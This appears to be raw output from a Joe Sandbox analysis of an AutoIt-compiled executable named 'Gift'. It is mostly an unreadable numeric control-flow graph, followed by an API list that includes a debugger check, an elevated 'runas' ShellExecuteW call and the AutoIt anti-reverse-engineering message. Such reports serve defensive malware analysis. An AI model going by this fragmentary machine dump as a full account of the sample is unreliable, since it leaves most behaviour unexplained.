99450->99446 99451->99372 99452->99367 99453->99365 99454->99381 99455->99386 99456->99391 99458 2f2f8e RtlFreeHeap 99457->99458 99459 2f2fb7 __dosmaperr 99457->99459 99458->99459 99460 2f2fa3 99458->99460 99459->99389 99469 2f8d58 58 API calls __getptd_noexit 99460->99469 99462 2f2fa9 GetLastError 99462->99459 99464 2f9001 99463->99464 99470 2f8e89 99464->99470 99468 2f901c 99468->99400 99469->99462 99471 2f8ea3 _memset __call_reportfault 99470->99471 99472 2f8ec3 IsDebuggerPresent 99471->99472 99478 2fa385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99472->99478 99475 2f8faa 99477 2fa370 GetCurrentProcess TerminateProcess 99475->99477 99476 2f8f87 __call_reportfault 99479 2fc826 99476->99479 99477->99468 99478->99476 99480 2fc82e 99479->99480 99481 2fc830 IsProcessorFeaturePresent 99479->99481 99480->99475 99483 305b3a 99481->99483 99486 305ae9 5 API calls 2 library calls 99483->99486 99485 305c1d 99485->99475 99486->99485 99488 2fa704 EncodePointer 99487->99488 99488->99488 99489 2fa71e 99488->99489 99489->99404 99491 2f9e3b __lock 58 API calls 99490->99491 99492 2f35a7 DecodePointer EncodePointer 99491->99492 99555 2f9fa5 LeaveCriticalSection 99492->99555 99494 2e6004 99495 2f3604 99494->99495 99496 2f360e 99495->99496 99497 2f3628 99495->99497 99496->99497 99556 2f8d58 58 API calls __getptd_noexit 99496->99556 99497->99413 99499 2f3618 99557 2f8fe6 9 API calls __fptostr 99499->99557 99501 2f3623 99501->99413 99502->99415 99504 2e524d __ftell_nolock 99503->99504 99505 2e1207 59 API calls 99504->99505 99506 2e5258 GetCurrentDirectoryW 99505->99506 99558 2e4ec8 99506->99558 99508 2e527e IsDebuggerPresent 99509 2e528c 99508->99509 99510 320b21 MessageBoxA 99508->99510 99511 320b39 99509->99511 99512 2e52a0 99509->99512 99510->99511 99666 2e314d 59 API calls Mailbox 99511->99666 99626 2e31bf 99512->99626 99515 320b49 99522 320b5f SetCurrentDirectoryW 99515->99522 99520 2e536c Mailbox 99520->99417 99522->99520 99555->99494 99556->99499 99557->99501 99559 
2e1207 59 API calls 99558->99559 99560 2e4ede 99559->99560 99675 2e5420 99560->99675 99562 2e4efc 99563 2e19e1 59 API calls 99562->99563 99564 2e4f10 99563->99564 99565 2e1c9c 59 API calls 99564->99565 99566 2e4f1b 99565->99566 99567 2d477a 59 API calls 99566->99567 99568 2e4f27 99567->99568 99569 2e1a36 59 API calls 99568->99569 99570 2e4f34 99569->99570 99571 2d39be 68 API calls 99570->99571 99572 2e4f44 Mailbox 99571->99572 99573 2e1a36 59 API calls 99572->99573 99574 2e4f68 99573->99574 99575 2d39be 68 API calls 99574->99575 99576 2e4f77 Mailbox 99575->99576 99577 2e1207 59 API calls 99576->99577 99578 2e4f94 99577->99578 99689 2e55bc 99578->99689 99581 2f312d _W_store_winword 60 API calls 99582 2e4fae 99581->99582 99583 320a54 99582->99583 99584 2e4fb8 99582->99584 99586 2e55bc 59 API calls 99583->99586 99585 2f312d _W_store_winword 60 API calls 99584->99585 99588 2e4fc3 99585->99588 99587 320a68 99586->99587 99590 2e55bc 59 API calls 99587->99590 99588->99587 99589 2e4fcd 99588->99589 99591 2f312d _W_store_winword 60 API calls 99589->99591 99592 320a84 99590->99592 99593 2e4fd8 99591->99593 99595 2f00cf 61 API calls 99592->99595 99593->99592 99594 2e4fe2 99593->99594 99596 2f312d _W_store_winword 60 API calls 99594->99596 99597 320aa7 99595->99597 99598 2e4fed 99596->99598 99599 2e55bc 59 API calls 99597->99599 99600 2e4ff7 99598->99600 99601 320ad0 99598->99601 99603 320ab3 99599->99603 99604 2e501b 99600->99604 99607 2e1c9c 59 API calls 99600->99607 99602 2e55bc 59 API calls 99601->99602 99605 320aee 99602->99605 99606 2e1c9c 59 API calls 99603->99606 99608 2d47be 59 API calls 99604->99608 99609 2e1c9c 59 API calls 99605->99609 99610 320ac1 99606->99610 99611 2e500e 99607->99611 99612 2e502a 99608->99612 99613 320afc 99609->99613 99614 2e55bc 59 API calls 99610->99614 99615 2e55bc 59 API calls 99611->99615 99616 2d4540 59 API calls 99612->99616 99617 2e55bc 59 API calls 99613->99617 99614->99601 99615->99604 99618 2e5038 99616->99618 99619 320b0b 
99617->99619 99620 2d43d0 59 API calls 99618->99620 99619->99619 99623 2e5055 99620->99623 99621 2d477a 59 API calls 99621->99623 99622 2d43d0 59 API calls 99622->99623 99623->99621 99623->99622 99624 2e55bc 59 API calls 99623->99624 99625 2e509b Mailbox 99623->99625 99624->99623 99625->99508 99627 2e31cc __ftell_nolock 99626->99627 99628 320314 _memset 99627->99628 99629 2e31e5 99627->99629 99631 320330 GetOpenFileNameW 99628->99631 99630 2f0284 60 API calls 99629->99630 99632 2e31ee 99630->99632 99633 32037f 99631->99633 99701 2f09c5 99632->99701 99635 2e1821 59 API calls 99633->99635 99637 320394 99635->99637 99637->99637 99639 2e3203 99719 2e278a 99639->99719 99666->99515 99676 2e542d __ftell_nolock 99675->99676 99677 2e1821 59 API calls 99676->99677 99683 2e5590 Mailbox 99676->99683 99679 2e545f 99677->99679 99678 2e1609 59 API calls 99678->99679 99679->99678 99688 2e5495 Mailbox 99679->99688 99680 2e1609 59 API calls 99680->99688 99681 2e5563 99682 2e1a36 59 API calls 99681->99682 99681->99683 99684 2e5584 99682->99684 99683->99562 99686 2e4c94 59 API calls 99684->99686 99685 2e1a36 59 API calls 99685->99688 99686->99683 99688->99680 99688->99681 99688->99683 99688->99685 99695 2e4c94 99688->99695 99690 2e55df 99689->99690 99691 2e55c6 99689->99691 99693 2e1821 59 API calls 99690->99693 99692 2e1c9c 59 API calls 99691->99692 99694 2e4fa0 99692->99694 99693->99694 99694->99581 99696 2e4ca2 99695->99696 99700 2e4cc4 _memmove 99695->99700 99698 2f0fe6 Mailbox 59 API calls 99696->99698 99697 2f0fe6 Mailbox 59 API calls 99699 2e4cd8 99697->99699 99698->99700 99699->99688 99700->99697 99702 301b70 __ftell_nolock 99701->99702 99703 2f09d2 GetLongPathNameW 99702->99703 99704 2e1821 59 API calls 99703->99704 99705 2e31f7 99704->99705 99706 2e2f3d 99705->99706 99707 2e1207 59 API calls 99706->99707 99708 2e2f4f 99707->99708 99709 2f0284 60 API calls 99708->99709 99710 2e2f5a 99709->99710 99711 320177 99710->99711 99712 2e2f65 99710->99712 99717 320191 99711->99717 
99759 2e151f 61 API calls 99711->99759 99713 2e4c94 59 API calls 99712->99713 99715 2e2f71 99713->99715 99753 2d1307 99715->99753 99718 2e2f84 Mailbox 99718->99639 99760 2e49c2 99719->99760 99722 31f8d6 99877 339b16 99722->99877 99723 2e49c2 136 API calls 99725 2e27c3 99723->99725 99725->99722 99754 2d1319 99753->99754 99758 2d1338 _memmove 99753->99758 99756 2f0fe6 Mailbox 59 API calls 99754->99756 99755 2f0fe6 Mailbox 59 API calls 99757 2d134f 99755->99757 99756->99758 99757->99718 99758->99755 99759->99711 99944 2e4b29 99760->99944 99765 2e49ed LoadLibraryExW 99954 2e4ade 99765->99954 99766 3208bb 99767 2e4a2f 84 API calls 99766->99767 99770 3208c2 99767->99770 99772 2e4ade 3 API calls 99770->99772 99774 3208ca 99772->99774 99773 2e4a14 99773->99774 99775 2e4a20 99773->99775 99980 2e4ab2 99774->99980 99776 2e4a2f 84 API calls 99775->99776 99778 2e27af 99776->99778 99778->99722 99778->99723 99781 3208f1 99988 2e4a6e 99781->99988 99878 2e4a8c 85 API calls 99877->99878 99993 2e4b77 99944->99993 99947 2e4b77 2 API calls 99950 2e4b50 99947->99950 99948 2e49d4 99951 2f547b 99948->99951 99949 2e4b60 FreeLibrary 99949->99948 99950->99948 99950->99949 99997 2f5490 99951->99997 99953 2e49e1 99953->99765 99953->99766 100109 2e4baa 99954->100109 99956 2e4b03 99959 2e4a05 99956->99959 99960 2e4b15 FreeLibrary 99956->99960 99958 2e4baa 2 API calls 99958->99956 99961 2e48b0 99959->99961 99960->99959 99962 2f0fe6 Mailbox 59 API calls 99961->99962 99963 2e48c5 99962->99963 99964 2e433f 59 API calls 99963->99964 99965 2e48d1 _memmove 99964->99965 99966 2e490c 99965->99966 99967 32080a 99965->99967 99968 2e4a6e 69 API calls 99966->99968 99969 320817 99967->99969 100118 339ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 99967->100118 99972 2e4915 99968->99972 100119 339f5e 95 API calls 99969->100119 99973 2e4ab2 74 API calls 99972->99973 99974 320859 99972->99974 99977 2e4a8c 85 API calls 99972->99977 99979 2e49a0 99972->99979 99973->99972 100113 
2e4a8c 99974->100113 99977->99972 99979->99773 99981 320945 99980->99981 99982 2e4ac4 99980->99982 100225 2f5802 99982->100225 99985 3396c4 100350 33951a 99985->100350 99987 3396da 99987->99781 99989 2e4a7d 99988->99989 99990 320908 99988->99990 99994 2e4b44 99993->99994 99995 2e4b80 LoadLibraryA 99993->99995 99994->99947 99994->99950 99995->99994 99996 2e4b91 GetProcAddress 99995->99996 99996->99994 99998 2f549c __lseeki64 99997->99998 99999 2f54af 99998->99999 100002 2f54e0 99998->100002 100046 2f8d58 58 API calls __getptd_noexit 99999->100046 100001 2f54b4 100047 2f8fe6 9 API calls __fptostr 100001->100047 100016 300718 100002->100016 100005 2f54e5 100006 2f54ee 100005->100006 100007 2f54fb 100005->100007 100048 2f8d58 58 API calls __getptd_noexit 100006->100048 100009 2f5525 100007->100009 100010 2f5505 100007->100010 100031 300837 100009->100031 100049 2f8d58 58 API calls __getptd_noexit 100010->100049 100013 2f54bf __lseeki64 @_EH4_CallFilterFunc@8 100013->99953 100017 300724 __lseeki64 100016->100017 100018 2f9e3b __lock 58 API calls 100017->100018 100029 300732 100018->100029 100019 3007a6 100051 30082e 100019->100051 100020 3007ad 100080 2f8a4d 58 API calls 2 library calls 100020->100080 100023 3007b4 100023->100019 100081 2fa05b InitializeCriticalSectionAndSpinCount 100023->100081 100024 300823 __lseeki64 100024->100005 100028 3007da EnterCriticalSection 100028->100019 100029->100019 100029->100020 100054 2f9ec3 100029->100054 100078 2f6e7d 59 API calls __lock 100029->100078 100079 2f6ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100029->100079 100032 300857 __wopenfile 100031->100032 100033 300871 100032->100033 100045 300a2c 100032->100045 100095 2f39fb 60 API calls 2 library calls 100032->100095 100093 2f8d58 58 API calls __getptd_noexit 100033->100093 100035 300876 100094 2f8fe6 9 API calls __fptostr 100035->100094 100037 300a8f 100090 3087d1 100037->100090 100038 2f5530 100050 2f5552 LeaveCriticalSection LeaveCriticalSection _fseek 
100038->100050 100041 300a25 100041->100045 100096 2f39fb 60 API calls 2 library calls 100041->100096 100043 300a44 100043->100045 100097 2f39fb 60 API calls 2 library calls 100043->100097 100045->100033 100045->100037 100046->100001 100047->100013 100048->100013 100049->100013 100050->100013 100082 2f9fa5 LeaveCriticalSection 100051->100082 100053 300835 100053->100024 100055 2f9ecf __lseeki64 100054->100055 100056 2f9ed8 100055->100056 100057 2f9ef0 100055->100057 100083 2fa39b 58 API calls __NMSG_WRITE 100056->100083 100066 2f9f11 __lseeki64 100057->100066 100086 2f8a4d 58 API calls 2 library calls 100057->100086 100059 2f9edd 100084 2fa3f8 58 API calls 6 library calls 100059->100084 100062 2f9f05 100064 2f9f0c 100062->100064 100065 2f9f1b 100062->100065 100063 2f9ee4 100085 2f32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100063->100085 100087 2f8d58 58 API calls __getptd_noexit 100064->100087 100067 2f9e3b __lock 58 API calls 100065->100067 100066->100029 100070 2f9f22 100067->100070 100072 2f9f2f 100070->100072 100073 2f9f47 100070->100073 100088 2fa05b InitializeCriticalSectionAndSpinCount 100072->100088 100075 2f2f85 _free 58 API calls 100073->100075 100076 2f9f3b 100075->100076 100089 2f9f63 LeaveCriticalSection _doexit 100076->100089 100078->100029 100079->100029 100080->100023 100081->100028 100082->100053 100083->100059 100084->100063 100086->100062 100087->100066 100088->100076 100089->100066 100098 307fb5 100090->100098 100092 3087ea 100092->100038 100093->100035 100094->100038 100095->100041 100096->100043 100097->100045 100099 307fc1 __lseeki64 100098->100099 100100 307fd7 100099->100100 100102 30800d 100099->100102 100101 2f8d58 __fptostr 58 API calls 100100->100101 100103 307fdc 100101->100103 100105 30807e __wsopen_nolock 109 API calls 100102->100105 100104 2f8fe6 __fptostr 9 API calls 100103->100104 100108 307fe6 __lseeki64 100104->100108 100106 308029 100105->100106 100107 308052 __wsopen_helper LeaveCriticalSection 
100106->100107 100107->100108 100108->100092 100110 2e4af7 100109->100110 100111 2e4bb3 LoadLibraryA 100109->100111 100110->99956 100110->99958 100111->100110 100112 2e4bc4 GetProcAddress 100111->100112 100112->100110 100114 2e4a9b 100113->100114 100117 320923 100113->100117 100120 2f5a6d 100114->100120 100118->99969 100119->99972 100121 2f5a79 __lseeki64 100120->100121 100122 2f5a8b 100121->100122 100124 2f5ab1 100121->100124 100151 2f8d58 58 API calls __getptd_noexit 100122->100151 100133 2f6e3e 100124->100133 100134 2f6e4e 100133->100134 100135 2f6e70 EnterCriticalSection 100133->100135 100134->100135 100228 2f581d 100225->100228 100227 2e4ad5 100227->99985 100229 2f5829 __lseeki64 100228->100229 100230 2f583f _memset 100229->100230 100231 2f586c 100229->100231 100232 2f5864 __lseeki64 100229->100232 100255 2f8d58 58 API calls __getptd_noexit 100230->100255 100233 2f6e3e __lock_file 59 API calls 100231->100233 100232->100227 100234 2f5872 100233->100234 100241 2f563d 100234->100241 100237 2f5859 100256 2f8fe6 9 API calls __fptostr 100237->100256 100244 2f5658 _memset 100241->100244 100248 2f5673 100241->100248 100242 2f5663 100346 2f8d58 58 API calls __getptd_noexit 100242->100346 100244->100242 100244->100248 100252 2f56b3 100244->100252 100245 2f5668 100347 2f8fe6 9 API calls __fptostr 100245->100347 100257 2f58a6 LeaveCriticalSection LeaveCriticalSection _fseek 100248->100257 100249 2f57c4 _memset 100349 2f8d58 58 API calls __getptd_noexit 100249->100349 100250 2f4906 __fseek_nolock 58 API calls 100250->100252 100252->100248 100252->100249 100252->100250 100258 30108b 100252->100258 100326 300dd7 100252->100326 100348 300ef8 58 API calls 3 library calls 100252->100348 100255->100237 100256->100232 100257->100232 100259 3010c3 100258->100259 100260 3010ac 100258->100260 100262 3017fb 100259->100262 100267 3010fd 100259->100267 100261 2f8d24 __lseeki64 58 API calls 100260->100261 100263 3010b1 100261->100263 100264 2f8d24 __lseeki64 58 API calls 100262->100264 
100266 2f8d58 __fptostr 58 API calls 100263->100266 100265 301800 100264->100265 100306 3010b8 100266->100306 100269 301105 100267->100269 100275 30111c 100267->100275 100271 2f8d24 __lseeki64 58 API calls 100269->100271 100274 301131 100275->100274 100278 30114b 100275->100278 100279 301169 100275->100279 100275->100306 100278->100274 100306->100252 100327 300de2 100326->100327 100331 300df7 100326->100331 100328 2f8d58 __fptostr 58 API calls 100327->100328 100329 300de7 100328->100329 100330 2f8fe6 __fptostr 9 API calls 100329->100330 100338 300df2 100330->100338 100332 300e2c 100331->100332 100333 306214 __getbuf 58 API calls 100331->100333 100331->100338 100334 2f4906 __fseek_nolock 58 API calls 100332->100334 100333->100332 100335 300e40 100334->100335 100338->100252 100346->100245 100347->100248 100348->100252 100349->100245 100353 2f542a GetSystemTimeAsFileTime 100350->100353 100352 339529 100352->99987 100354 2f5458 __aulldiv 100353->100354 100354->100352 100538 2e4d83 100539 2e4dba 100538->100539 100540 2e4e35 100539->100540 100541 2e4dd8 100539->100541 100542 2e4e37 100539->100542 100545 2e4e1a DefWindowProcW 100540->100545 100543 2e4ead PostQuitMessage 100541->100543 100544 2e4de5 100541->100544 100546 3209c2 100542->100546 100547 2e4e3d 100542->100547 100551 2e4e28 100543->100551 100548 320a35 100544->100548 100549 2e4df0 100544->100549 100545->100551 100593 2dc460 10 API calls Mailbox 100546->100593 100552 2e4e65 SetTimer RegisterWindowMessageW 100547->100552 100553 2e4e42 100547->100553 100596 332cce 97 API calls _memset 100548->100596 100554 2e4df8 100549->100554 100555 2e4eb7 100549->100555 100552->100551 100556 2e4e8e CreatePopupMenu 100552->100556 100559 320965 100553->100559 100560 2e4e49 KillTimer 100553->100560 100561 320a1a 100554->100561 100562 2e4e03 100554->100562 100583 2e5b29 100555->100583 100556->100551 100558 3209e9 100594 2dc483 277 API calls Mailbox 100558->100594 100566 32096a 100559->100566 100567 32099e MoveWindow 100559->100567 
100568 2e5ac3 Shell_NotifyIconW 100560->100568 100561->100545 100595 328854 59 API calls Mailbox 100561->100595 100569 2e4e0e 100562->100569 100570 2e4e9b 100562->100570 100563 320a47 100563->100545 100563->100551 100571 32096e 100566->100571 100572 32098d SetFocus 100566->100572 100567->100551 100573 2e4e5c 100568->100573 100569->100545 100580 2e5ac3 Shell_NotifyIconW 100569->100580 100591 2e5bd7 107 API calls _memset 100570->100591 100571->100569 100576 320977 100571->100576 100572->100551 100590 2d34e4 DeleteObject DestroyWindow Mailbox 100573->100590 100592 2dc460 10 API calls Mailbox 100576->100592 100578 2e4eab 100578->100551 100581 320a0e 100580->100581 100582 2e59d3 94 API calls 100581->100582 100582->100540 100584 2e5bc2 100583->100584 100585 2e5b40 _memset 100583->100585 100584->100551 100586 2e56f8 87 API calls 100585->100586 100588 2e5b67 100586->100588 100587 2e5bab KillTimer SetTimer 100587->100584 100588->100587 100589 320d6e Shell_NotifyIconW 100588->100589 100589->100587 100590->100551 100591->100578 100592->100551 100593->100558 100594->100569 100595->100540 100596->100563 100597 2d107d 100602 2e2fc5 100597->100602 100599 2d108c 100600 2f2f70 __cinit 67 API calls 100599->100600 100601 2d1096 100600->100601 100603 2e2fd5 __ftell_nolock 100602->100603 100604 2e1207 59 API calls 100603->100604 100605 2e308b 100604->100605 100606 2f00cf 61 API calls 100605->100606 100607 2e3094 100606->100607 100633 2f08c1 100607->100633 100610 2e1900 59 API calls 100611 2e30ad 100610->100611 100612 2e4c94 59 API calls 100611->100612 100613 2e30bc 100612->100613 100614 2e1207 59 API calls 100613->100614 100615 2e30c5 100614->100615 100616 2e19e1 59 API calls 100615->100616 100617 2e30ce RegOpenKeyExW 100616->100617 100618 3201a3 RegQueryValueExW 100617->100618 100622 2e30f0 Mailbox 100617->100622 100619 3201c0 100618->100619 100620 320235 RegCloseKey 100618->100620 100621 2f0fe6 Mailbox 59 API calls 100619->100621 100620->100622 100632 320247 _wcscat Mailbox 
__NMSG_WRITE 100620->100632 100623 3201d9 100621->100623 100622->100599 100624 2e433f 59 API calls 100623->100624 100625 3201e4 RegQueryValueExW 100624->100625 100626 320201 100625->100626 100629 32021b 100625->100629 100628 2e1821 59 API calls 100626->100628 100627 2e1609 59 API calls 100627->100632 100628->100629 100629->100620 100630 2e1a36 59 API calls 100630->100632 100631 2e4c94 59 API calls 100631->100632 100632->100622 100632->100627 100632->100630 100632->100631 100634 301b70 __ftell_nolock 100633->100634 100635 2f08ce GetFullPathNameW 100634->100635 100636 2f08f0 100635->100636 100637 2e1821 59 API calls 100636->100637 100638 2e309f 100637->100638 100638->100610 100639 312b43 100643 326b59 100639->100643 100641 312b4e 100642 326b59 85 API calls 100641->100642 100642->100641 100649 326b93 100643->100649 100651 326b66 100643->100651 100644 326b95 100655 2d4818 84 API calls Mailbox 100644->100655 100646 326b9a 100647 2d4d37 84 API calls 100646->100647 100648 326ba1 100647->100648 100650 2e17e0 59 API calls 100648->100650 100649->100641 100650->100649 100651->100644 100651->100646 100651->100649 100652 326b8d 100651->100652 100654 2d4aa0 59 API calls _wcsstr 100652->100654 100654->100649 100655->100646 100656 30e463 100668 2d373a 100656->100668 100658 30e479 100659 30e4fa 100658->100659 100660 30e48f 100658->100660 100662 2db020 277 API calls 100659->100662 100677 2d5376 60 API calls 100660->100677 100667 30e4ee Mailbox 100662->100667 100664 30e4ce 100664->100667 100678 33890a 59 API calls Mailbox 100664->100678 100665 30f046 Mailbox 100667->100665 100679 33a48d 89 API calls 4 library calls 100667->100679 100669 2d3758 100668->100669 100670 2d3746 100668->100670 100672 2d375e 100669->100672 100673 2d3787 100669->100673 100671 2d523c 59 API calls 100670->100671 100676 2d3750 100671->100676 100675 2f0fe6 Mailbox 59 API calls 100672->100675 100674 2d523c 59 API calls 100673->100674 100674->100676 100675->100676 100676->100658 100677->100664 100678->100667 
100679->100665 100680 2d1055 100685 2d2a19 100680->100685 100683 2f2f70 __cinit 67 API calls 100684 2d1064 100683->100684 100686 2e1207 59 API calls 100685->100686 100687 2d2a87 100686->100687 100692 2d1256 100687->100692 100689 2d2b24 100690 2d105a 100689->100690 100695 2d13f8 59 API calls 2 library calls 100689->100695 100690->100683 100696 2d1284 100692->100696 100695->100689 100697 2d1291 100696->100697 100698 2d1275 100696->100698 100697->100698 100699 2d1298 RegOpenKeyExW 100697->100699 100698->100689 100699->100698 100700 2d12b2 RegQueryValueExW 100699->100700 100701 2d12e8 RegCloseKey 100700->100701 100702 2d12d3 100700->100702 100701->100698 100702->100701 100703 2d5ff5 100726 2d5ede Mailbox _memmove 100703->100726 100704 2f0fe6 59 API calls Mailbox 100704->100726 100705 2d6a9b 100771 2da9de 277 API calls 100705->100771 100707 2d53b0 277 API calls 100707->100726 100708 30eff9 100783 2d5190 59 API calls Mailbox 100708->100783 100710 30f007 100784 33a48d 89 API calls 4 library calls 100710->100784 100714 30efeb 100760 2d5569 Mailbox 100714->100760 100782 326cf1 59 API calls Mailbox 100714->100782 100715 2d60e5 100716 30e137 100715->100716 100722 2d63bd Mailbox 100715->100722 100729 2d6abc 100715->100729 100736 2d6152 Mailbox 100715->100736 100716->100722 100772 327aad 59 API calls 100716->100772 100717 2e1c9c 59 API calls 100717->100726 100720 2f0fe6 Mailbox 59 API calls 100725 2d63d1 100720->100725 100721 2e1a36 59 API calls 100721->100726 100722->100720 100734 2d6426 100722->100734 100723 2d523c 59 API calls 100723->100726 100724 34c355 277 API calls 100724->100726 100727 2d63de 100725->100727 100725->100729 100726->100704 100726->100705 100726->100707 100726->100708 100726->100710 100726->100715 100726->100717 100726->100721 100726->100723 100726->100724 100726->100729 100726->100760 100775 337f11 59 API calls Mailbox 100726->100775 100776 326cf1 59 API calls Mailbox 100726->100776 100730 30e172 100727->100730 100731 2d6413 100727->100731 100781 33a48d 89 
API calls 4 library calls 100729->100781 100773 34c87c 85 API calls 2 library calls 100730->100773 100731->100734 100762 2d5447 Mailbox 100731->100762 100774 34c9c9 95 API calls Mailbox 100734->100774 100736->100714 100736->100729 100752 30e2e9 VariantClear 100736->100752 100736->100760 100765 34e60c 130 API calls 100736->100765 100766 345e1d 95 API calls 100736->100766 100767 2dcfd7 98 API calls 100736->100767 100768 34ec68 92 API calls 100736->100768 100769 34ebba 86 API calls 100736->100769 100770 2d5190 59 API calls Mailbox 100736->100770 100777 327aad 59 API calls 100736->100777 100737 30e19d 100737->100737 100738 30e691 100778 33a48d 89 API calls 4 library calls 100738->100778 100739 30f165 100786 33a48d 89 API calls 4 library calls 100739->100786 100743 2d6e30 60 API calls 100743->100762 100744 30e6a0 100745 2e1c9c 59 API calls 100745->100762 100746 2d69fa 100748 2e1c9c 59 API calls 100746->100748 100747 2f0fe6 59 API calls Mailbox 100747->100762 100748->100760 100750 2d69ff 100750->100738 100750->100739 100751 30ea9a 100755 2e1c9c 59 API calls 100751->100755 100752->100736 100753 2e1207 59 API calls 100753->100762 100754 2d7e50 277 API calls 100754->100762 100755->100760 100756 30eb67 100756->100760 100779 327aad 59 API calls 100756->100779 100757 327aad 59 API calls 100757->100762 100758 2f2f70 67 API calls __cinit 100758->100762 100761 30ef28 100780 33a48d 89 API calls 4 library calls 100761->100780 100762->100738 100762->100743 100762->100745 100762->100746 100762->100747 100762->100750 100762->100751 100762->100753 100762->100754 100762->100756 100762->100757 100762->100758 100762->100760 100762->100761 100764 2d5a1a 100762->100764 100785 33a48d 89 API calls 4 library calls 100764->100785 100765->100736 100766->100736 100767->100736 100768->100736 100769->100736 100770->100736 100771->100729 100772->100722 100773->100734 100774->100737 100775->100726 100776->100726 100777->100736 100778->100744 100779->100760 100780->100764 100781->100714 100782->100760 
100783->100714 100784->100714 100785->100760 100786->100760 100787 2d7357 100788 2d7360 100787->100788 100789 2d78f5 100787->100789 100788->100789 100790 2d4d37 84 API calls 100788->100790 100797 2d6fdb Mailbox 100789->100797 100798 3287f9 59 API calls _memmove 100789->100798 100791 2d738b 100790->100791 100791->100789 100793 2d739b 100791->100793 100794 2e1680 59 API calls 100793->100794 100794->100797 100795 30f91b 100796 2e1c9c 59 API calls 100795->100796 100796->100797 100798->100795 100799 2d1016 100804 2e5ce7 100799->100804 100802 2f2f70 __cinit 67 API calls 100803 2d1025 100802->100803 100805 2f0fe6 Mailbox 59 API calls 100804->100805 100806 2e5cef 100805->100806 100807 2d101b 100806->100807 100811 2e5f39 100806->100811 100807->100802 100812 2e5f42 100811->100812 100814 2e5cfb 100811->100814 100813 2f2f70 __cinit 67 API calls 100812->100813 100813->100814 100815 2e5d13 100814->100815 100816 2e1207 59 API calls 100815->100816 100817 2e5d2b GetVersionExW 100816->100817 100818 2e1821 59 API calls 100817->100818 100819 2e5d6e 100818->100819 100820 2e1981 59 API calls 100819->100820 100831 2e5d9b 100819->100831 100821 2e5d8f 100820->100821 100822 2e133d 59 API calls 100821->100822 100822->100831 100823 2e5e00 GetCurrentProcess IsWow64Process 100824 2e5e19 100823->100824 100826 2e5e2f 100824->100826 100827 2e5e98 GetSystemInfo 100824->100827 100825 321098 100839 2e55f0 100826->100839 100828 2e5e65 100827->100828 100828->100807 100831->100823 100831->100825 100832 2e5e8c GetSystemInfo 100834 2e5e56 100832->100834 100833 2e5e41 100835 2e55f0 2 API calls 100833->100835 100834->100828 100836 2e5e5c FreeLibrary 100834->100836 100837 2e5e49 GetNativeSystemInfo 100835->100837 100836->100828 100837->100834 100840 2e5619 100839->100840 100841 2e55f9 LoadLibraryA 100839->100841 100840->100832 100840->100833 100841->100840 100842 2e560a GetProcAddress 100841->100842 100842->100840 100843 3392c8 100844 3392d5 100843->100844 100845 3392db 100843->100845 100846 2f2f85 _free 58 
API calls 100844->100846 100847 2f2f85 _free 58 API calls 100845->100847 100848 3392ec 100845->100848 100846->100845 100847->100848 100849 2f2f85 _free 58 API calls 100848->100849 100850 3392fe 100848->100850 100849->100850

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002E526C
• IsDebuggerPresent.KERNEL32 ref: 002E527E
• GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 002E52E6
  • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
  • Part of subcall function 002DBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002DBC07
• SetCurrentDirectoryW.KERNEL32(?), ref: 002E5366
• MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00320B2E
• SetCurrentDirectoryW.KERNEL32(?), ref: 00320B66
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00386D10), ref: 00320BE9
• ShellExecuteW.SHELL32(00000000), ref: 00320BF0
  • Part of subcall function 002E514C: GetSysColorBrush.USER32(0000000F), ref: 002E5156
  • Part of subcall function 002E514C: LoadCursorW.USER32(00000000,00007F00), ref: 002E5165
  • Part of subcall function 002E514C: LoadIconW.USER32(00000063), ref: 002E517C
  • Part of subcall function 002E514C: LoadIconW.USER32(000000A4), ref: 002E518E
  • Part of subcall function 002E514C: LoadIconW.USER32(000000A2), ref: 002E51A0
  • Part of subcall function 002E514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002E51C6
  • Part of subcall function 002E514C: RegisterClassExW.USER32(?), ref: 002E521C
  • Part of subcall function 002E50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002E5109
  • Part of subcall function 002E50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002E512A
  • Part of subcall function 002E50DB: ShowWindow.USER32(00000000), ref: 002E513E
  • Part of subcall function 002E50DB: ShowWindow.USER32(00000000), ref: 002E5147
  • Part of subcall function 002E59D3: _memset.LIBCMT ref: 002E59F9
  • Part of subcall function 002E59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 002E5A9E
Strings
• runas, xrefs: 00320BE4
• It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00320B28
• AutoIt, xrefs: 00320B23
Memory Dump Source
• Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
• Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
• String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
• API String ID: 529118366-2030392706
• Opcode ID: 26604b693f789dbd8b8d5e23dfbbe1706b49a099ebef9434f0b7feeb921b2f13
